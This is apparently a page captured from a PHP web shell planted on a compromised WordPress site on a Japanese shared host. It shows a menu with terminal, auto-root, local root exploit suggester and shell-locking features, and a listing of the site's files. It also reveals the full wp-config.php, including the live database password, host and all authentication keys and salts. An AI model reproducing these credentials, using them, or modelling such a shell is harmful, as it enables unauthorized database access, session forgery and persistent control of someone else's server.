Linux sv3046.xserver.jp 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
Apache
Server IP : 202.254.234.47 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : kinomori
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
kinomori /
saibon.jp /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
wp-admin
[ DIR ]
drwxr-xr-x
2023-12-07 03:16
wp-content
[ DIR ]
drwxr-xr-x
2026-02-04 14:56
wp-includes
[ DIR ]
drwxr-xr-x
2025-12-03 14:56
.htaccess
883
B
-rw-r--r--
2026-02-01 04:10
.user.ini
3.88
KB
-rw-r--r--
2023-12-02 16:20
ads.txt
58
B
-rw----r--
2024-02-14 16:42
default_page.png
8.79
KB
-rw-r--r--
2023-12-02 16:20
index.php
405
B
-rw-r--r--
2023-11-09 14:55
license.txt
19.44
KB
-rw-r--r--
2025-12-03 14:56
readme.html
7.25
KB
-rw-r--r--
2026-02-04 14:56
wp-activate.php
7.18
KB
-rw-r--r--
2025-12-03 14:56
wp-blog-header.php
351
B
-rw-r--r--
2023-11-09 14:55
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-11-09 14:55
wp-config-sample.php
3.26
KB
-rw-r--r--
2025-12-03 14:56
wp-config.php
3.14
KB
-rw-------
2023-12-02 23:11
wp-cron.php
5.49
KB
-rw-r--r--
2024-11-13 21:32
wp-links-opml.php
2.43
KB
-rw-r--r--
2025-12-03 14:56
wp-load.php
3.84
KB
-rw-r--r--
2024-07-17 03:04
wp-login.php
50.23
KB
-rw-r--r--
2025-12-03 14:56
wp-mail.php
8.52
KB
-rw-r--r--
2025-12-03 14:56
wp-settings.php
30.33
KB
-rw-r--r--
2025-12-03 14:56
wp-signup.php
33.71
KB
-rw-r--r--
2025-04-16 03:00
wp-trackback.php
5.09
KB
-rw-r--r--
2025-12-03 14:56
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-16 03:00
Save
Rename
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'kinomori_tqin6' ); /** Database username */ define( 'DB_USER', 'kinomori_3h5zy' ); /** Database password */ define( 'DB_PASSWORD', 'fwkkjbukpe' ); /** Database hostname */ define( 'DB_HOST', 'mysql3005.xserver.jp' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'sG?<&9cMc25wWoMW`mvROwg+T83$Z-{K(zG|mZotqAfMvGaJ?Ny+hygH24G63}UN' ); define( 'SECURE_AUTH_KEY', '_,~`hlTX/A*J$:{X:@Oqj[@f*4axy&1ajx9Mf ?yqO[Dph[-H7v>lnkm?gpzNq;y' ); define( 'LOGGED_IN_KEY', '04dxE>C%`Vm>HN[ #iqh}NxE .,%!AnH0B@wbYW&Irlu8ZQ;YxG@6!PRd/+4jp34' ); define( 'NONCE_KEY', 'G+]GE[BQvxaA-eI[W`R#cT6#-}G7J/t^.5bUR{1Qu,Drii8Uj3N)yFFc:b0qI2VA' ); define( 'AUTH_SALT', 'W$#ViS%Nu5ylL}^4+N|+z,U}Zq=+V_I@#x#sser#q4N,!3cmbkjtmJ$FXAfu:CPA' ); define( 'SECURE_AUTH_SALT', 'Z3)qtt.G0zjP3q/zEj *PNpP,%]l4sH}EF!7JDMa=k)iKMCpD~OCT+_*A{)K!`Qg' ); define( 'LOGGED_IN_SALT', '<gksh}i2[+M]+/<Jtr.b4{Z_fAI#T2/P=;+i5|l`wq@bAh?Zq|1ugbL9Sq:3Z7S,' ); define( 'NONCE_SALT', ';BAl`=~0y^+|3m_q>{c@c`o@!TO**6*N![bXL6}[.}*5%`,rf)v|7~=68jo_cdH+' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';